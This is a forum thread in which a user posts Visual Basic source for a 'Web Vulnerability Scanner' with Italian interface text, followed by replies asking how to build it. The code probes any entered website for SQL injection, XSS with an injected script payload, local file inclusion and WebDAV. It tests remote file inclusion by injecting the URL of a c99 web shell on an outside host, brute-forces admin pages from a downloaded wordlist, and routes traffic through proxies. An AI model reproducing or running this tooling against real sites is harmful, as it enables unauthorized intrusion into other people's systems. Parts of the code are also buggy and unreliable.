PDA

View Full Version : Web Vulnerability Scanner Source Code



[SSH]Anubi
04-03-2013, 08:03 AM
YOU NEED VISUAL BASIC!


Imports System.Net

Public Class Form1
Public Proxystr As String
Public versione As Decimal = 0.01
Public sub_version As String = "Alpha Release"
Public messaggio As String
Public titolo As String
Private Sub Cross_Threading() Handles Me.Load

Control.CheckForIllegalCrossThreadCalls = False ' :'(

End Sub

Private Sub Thief3Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button1.Click
If Site_Info.siteUp(TextBox1.Text & TextBox2.Text) = True Then
Dim thread_ As New System.Threading.Thread(AddressOf Scan_Vln)
thread_.Start()
Else
Showmsg("Web site doesn't exist", "Warning")
End If

End Sub

Private Sub Scan_Vln()
Thief3Button1.Text = "Attendere..."
DroneProgressBar1.Maximum = 10
DroneProgressBar1.Value = 0
Dim Url As String = TextBox1.Text & TextBox2.Text

Application.DoEvents()
If SQL_Injection_Scanner.vulnerabile(Url) = True Then
Label2.Text = "Sql Injection - Vulnerabile"
Label2.ForeColor = Color.Red
Else
Label2.Text = "Sql Injection - Non Vulnerabile"
Label2.ForeColor = Color.Green
End If
DroneProgressBar1.Value = 2
Application.DoEvents()

If Rfi_Scanner.Vulnerabile(Url, "http://www.sh3ll.org/c99.txt") = True Then
Label3.Text = "Rfi - Vulnerabile"
Label3.ForeColor = Color.Red
Else
Label3.Text = "Rfi - Non Vulnerabile"
Label3.ForeColor = Color.Green
End If
DroneProgressBar1.Value = 4
Application.DoEvents()
If Lfi_Scanner.Vulnerabile(Url) = True Then
Label4.Text = "Lfi - Vulnerabile"
Label4.ForeColor = Color.Red
Else
Label4.Text = "Lfi - Non Vulnerabile"
Label4.ForeColor = Color.Green
End If
DroneProgressBar1.Value = 6
Application.DoEvents()
If Xss_Scanner.Vulnerabile(Url) = True Then
Label5.Text = "Xss - Vulnerabile"
Label5.ForeColor = Color.Red
Else
Label5.Text = "Xss - Non Vulnerabile"
Label5.ForeColor = Color.Green
End If
DroneProgressBar1.Value = 8
Application.DoEvents()
If WebDav_Scanner.Vulnerabile(TextBox1.Text) = True Then
Label6.Text = "WebDav - Vulnerabile"
Label6.ForeColor = Color.Red
Else
Label6.Text = "WebDav - Non Vulnerabile"
Label6.ForeColor = Color.Green
End If

DroneProgressBar1.Value = 10
Thief3Button1.Text = "Scan"
Application.DoEvents()


End Sub

Private Sub Thief3Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button2.Click
Admin_Page_Finder.Show()
End Sub
Private Sub Rimuovi_Finestra() Handles Me.Load
Thief3Theme1.Text = Thief3Theme1.Text & " - " & sub_version
Me.FormBorderStyle = Windows.Forms.FormBorderStyle.None
End Sub

Private Sub Thief3Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button3.Click
Proxy_Checher.Show()
End Sub
Private Sub Thief3Button4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button4.Click
About.Show()
End Sub
Public Sub Showmsg(ByVal text As String, ByVal titoloa As String) ' Message Box Personalizzata ;)
messaggio = text
titolo = titoloa
msg.Show()
End Sub

Private Sub DroneButton2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton2.Click
Me.Close()
End Sub

End Class

Public Class Proxy

Shared Function Get_Proxy(ByVal url As String) As System.Net.WebProxy
Return New System.Net.WebProxy(url)
End Function
End Class
Public Class SQL_Injection_Scanner

Shared Function vulnerabile(ByVal link As String) As Boolean
Try

If Not link.Contains("=") Then
Return False
Else
Dim WC As New System.Net.WebClient
If Form1.Proxystr <> Nothing Then
WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
End If
Dim Source As String = WC.DownloadString(link.Replace("=", "='"))
If Source.Contains("You have an error in your SQL syntax") Or Source.Contains("Fatal error") Or Source.Contains("Warning") Then
Return True
Else
Return False
End If
End If
Catch ex As Exception
Return False
Form1.Showmsg(ex.Message, "Errore")
End Try

End Function
End Class
Public Class Xss_Scanner
Shared Function Vulnerabile(ByVal link As String) As Boolean
Dim WC As New System.Net.WebClient
If Form1.Proxystr <> Nothing Then
WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
End If
For i = 0 To link.Split(vbNewLine).Length - 1
Dim Source As String = WC.DownloadString(link.Split(vbNewLine)(i).Trim.Sp lit("=")(i) & "=" & Chr(34) & "><script>alert('XSS_SUCCESSFUL')</script>")
If Source.Contains("<script>alert('XSS_SUCCESSFUL')</script>") And Not Source.Contains("You have an error in your SQL syntax") Then
Return True
Exit For
Else
Return False
End If
Next
End Function
End Class
Public Class WebDav_Scanner
Shared Function Vulnerabile(ByVal link As String) As Boolean

Try

Dim WC As New System.Net.WebClient
If Form1.Proxystr <> Nothing Then
WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
End If
Dim s As String = "http://" & link & "/webdav/"
Dim request As System.Net.HttpWebRequest = DirectCast(System.Net.WebRequest.Create((s)), System.Net.HttpWebRequest)
request.Timeout = 5000
Dim response As System.Net.HttpWebResponse = DirectCast(request.GetResponse, System.Net.HttpWebResponse)
Dim str As String = New System.IO.StreamReader(response.GetResponseStream) .ReadToEnd
If str.Contains("WebDAV testpage") Then
Return True
Else
Return False
End If
Catch ex As Exception
Return False
End Try

End Function
End Class
Public Class Lfi_Scanner
Shared Function Vulnerabile(ByVal link As String) As Boolean
Try
Dim WC As New System.Net.WebClient
If Form1.Proxystr <> Nothing Then
WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
End If
For i = 0 To link.Split(vbNewLine).Length - 1
Dim v As String = link.Split(vbNewLine)(i).Trim.Split("=")(0) & "=../"
If v.Contains("=") Then
Dim Source As String = WC.DownloadString(v)
If Source.Contains("No such file or directory") Then
Return True
Else
Return False
End If
End If
Next
Catch ex As Exception

End Try

End Function
End Class

Public Class Rfi_Scanner
Shared Function Vulnerabile(ByVal link As String, ByVal SHELL_URL As String) As Boolean
Try
Dim WC As New System.Net.WebClient
If Form1.Proxystr <> Nothing Then
WC.Proxy = Proxy.Get_Proxy(Form1.Proxystr)
End If
For i = 0 To link.Split(vbNewLine).Length - 1
Dim v As String = link.Split(vbNewLine)(i).Trim.Split("=")(0) & "=" & SHELL_URL & "?"
If v.Contains("=") Then
Dim Source As String = WC.DownloadString(v)
If Source.Contains("RFI_SUCCESSFUL") And Not Source.Contains("$invulnerable") And Source.Length > 20 Then
Return True
Else
Return False
End If

End If
Next
Catch ex As Exception
Form1.Showmsg(ex.Message, "Errore")
Return False
End Try

End Function
End Class

Public Class Site_Info
Shared Function siteUp(ByVal url As String) As Boolean
Dim result As Boolean = False
Try
Dim request As HttpWebRequest = DirectCast(HttpWebRequest.Create(url), HttpWebRequest)
request.Credentials = DirectCast(CredentialCache.DefaultCredentials, NetworkCredential)
request.Method = "HEAD" ' anche GET ma pi? lento
Using response As HttpWebResponse = DirectCast(request.GetResponse(), HttpWebResponse)
result = Not (response Is Nothing OrElse response.StatusCode <> HttpStatusCode.OK)
End Using
Catch e As Exception
result = False
End Try
Return result
End Function
End Class
Public Class Proxy_Checker
Shared Function Proxy_Ok(ByVal proxy As String, Optional ByVal Test_Site As String = "http://www.google.com") As Boolean
Dim wc As New System.Net.WebClient
Try
wc.Proxy = New System.Net.WebProxy(proxy)
wc.OpenRead(Test_Site)
Return True
Catch
Return False
End Try
End Function


End Class






Imports System.Net
Imports System.IO
Public Class Admin_Page_Finder
Dim Pagine_ToT As Integer
Dim Pagine_Controllate As Integer
Dim Dork_Lst As New ListBox
Private Sub Scarica_Dork()
TextBox2.Text = Form1.TextBox1.Text
Pagine_ToT = -1
If IO.File.Exists("Admin.txt") Then
IO.File.Delete("Admin.txt")
End If
My.Computer.Network.DownloadFile("http://server4project.altervista.org/Programmi/Web%20Vulnerability%20Scanner/Admin.txt", "Admin.txt") ' File contente pagine admin
Dim oFile As System.IO.File
Dim oRead As System.IO.StreamReader

Try
oRead = oFile.OpenText("Admin.txt")

While oRead.Peek <> -1
Dork_Lst.Items.Add(oRead.ReadLine())
Pagine_ToT += 1
End While

Catch ex As Exception

Finally
oRead.Close()
End Try
Dim T
For i = 0 To Dork_Lst.Items.Count - 1
T = T & Dork_Lst.Items.Item(i).ToString() & vbCrLf
Next
' IO.File.WriteAllText(My.Computer.FileSystem.Specia lDirectories.Desktop & "\T.txt", T) salva il risultato in un file di testo
End Sub

Sub Scan_For_Page()
DroneProgressBar1.Maximum = Pagine_ToT
DroneProgressBar1.Value = 0
Pagine_Controllate = 0
ListBox2.Items.Clear()
For i = 0 To Dork_Lst.Items.Count - 1
Dork_Lst.SelectedIndex = i
Dim sito As String = TextBox2.Text & Dork_Lst.SelectedItem

If Site_Info.siteUp(sito) = True Then
ListBox2.Items.Add(sito)
End If

Pagine_Controllate += 1
Label1.Text = i & " / " & Pagine_ToT & " | " & Dork_Lst.SelectedItem
DroneProgressBar1.Value = Pagine_Controllate
Application.DoEvents()
Next
If ListBox2.Items.Count = 0 Then
ListBox2.Items.Add("Nessun Risultato")
End If
Thief3Button2.Text = "Scan"
End Sub
Dim th As Threading.Thread
Private Sub Thief3Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button2.Click

If Thief3Button2.Text = "Scan" Then
Dim t As New Threading.Thread(AddressOf Scan)
t.Start()
th = t
Thief3Button2.Text = "Stop"
Else
th.Abort()
Thief3Button2.Text = "Scan"
End If

End Sub
Private Sub Scan()

If TextBox2.Text.EndsWith("/") = True Then
Scan_For_Page()
Else
Form1.Showmsg("Url invalido", "Attenzione")
End If
End Sub
Private Sub loadd() Handles Me.Load
Control.CheckForIllegalCrossThreadCalls = False ' :'(
Scarica_Dork()
End Sub

Private Sub ListBox2_DoubleClick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ListBox2.DoubleClick
If Not ListBox2.SelectedItem = Nothing And Not ListBox2.SelectedItem = "Nessun Risultato" Then
Process.Start(ListBox2.SelectedItem)
End If
End Sub

Private Sub Thief3Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs)
If Site_Info.siteUp(TextBox2.Text) Then
TextBox2.ForeColor = Color.Green
Else
TextBox2.ForeColor = Color.Red
End If
End Sub
Private Sub Rimuovi_Finestra() Handles Me.Load
Me.FormBorderStyle = Windows.Forms.FormBorderStyle.None
End Sub

Private Sub DroneButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton1.Click
Me.Close()
End Sub

Private Sub ico() Handles Me.Load
Me.Icon = Form1.Icon
End Sub
End Class








Public Class msg

Private Sub DroneButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton1.Click
Me.Close()
End Sub

Private Sub hs() Handles Me.Load
Label1.Text = Form1.messaggio
DroneTheme1.Text = Form1.titolo
Me.TopMost = True
resizec()
End Sub

Private Sub resizec() Handles Me.HandleCreated
While Label1.Bounds.IntersectsWith(DroneSeperator1.Bound s)
Me.Size = New Size(Me.Size.Width + 10, Me.Size.Height)
End While

End Sub

End Class






Public Class Proxy_Checher
Private Sub Carica() Handles Me.Load
Control.CheckForIllegalCrossThreadCalls = False
End Sub
Dim t As Threading.Thread
Private Sub Thief3Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button1.Click
If Thief3Button1.Text = "Check" Then
Label2.Text = "Attendere..."
Thief3Button1.Text = "Stop"
Dim th As New System.Threading.Thread(AddressOf Check)
t = th
th.Start()
Application.DoEvents()
Else
t.Abort()
Label2.Text = "Processo Interrotto"
Thief3Button1.Text = "Check"
End If

End Sub
Sub Check()
Dim Test As New Stopwatch
Test.Start()
If Proxy_Checker.Proxy_Ok(TextBox1.Text) = True Then
Test.Stop()
Label2.Text = TextBox1.Text & " - Funzionante - " & Test.ElapsedMilliseconds & " ms"
Label2.ForeColor = Color.Green
Else
Label2.Text = TextBox1.Text & " - Non Funzionante"
Label2.ForeColor = Color.Red
Test.Stop()
End If
Thief3Button1.Text = "Check"
End Sub


Private Sub Thief3Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Button3.Click
Form1.Proxystr = TextBox1.Text
End Sub
Private Sub Rimuovi_Finestra() Handles Me.Load
Me.FormBorderStyle = Windows.Forms.FormBorderStyle.None
End Sub
Private Sub DroneButton1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles DroneButton1.Click
Me.Close()
End Sub
Private Sub ico() Handles Me.Load
Me.Icon = Form1.Icon
End Sub

Private Sub Thief3Theme1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Thief3Theme1.Click

End Sub
End Class

BruceWayne
04-03-2013, 09:11 AM
So what is this exactly for? And what is the source?

GetParanoid
04-03-2013, 05:40 PM
What all buttons do we need to add to get this working?

Dr41DeY
09-05-2013, 12:46 PM
Thanks, for posting! :)
Looks, good the coding.

But, what do we need to add?

You're only giving us the source code! :$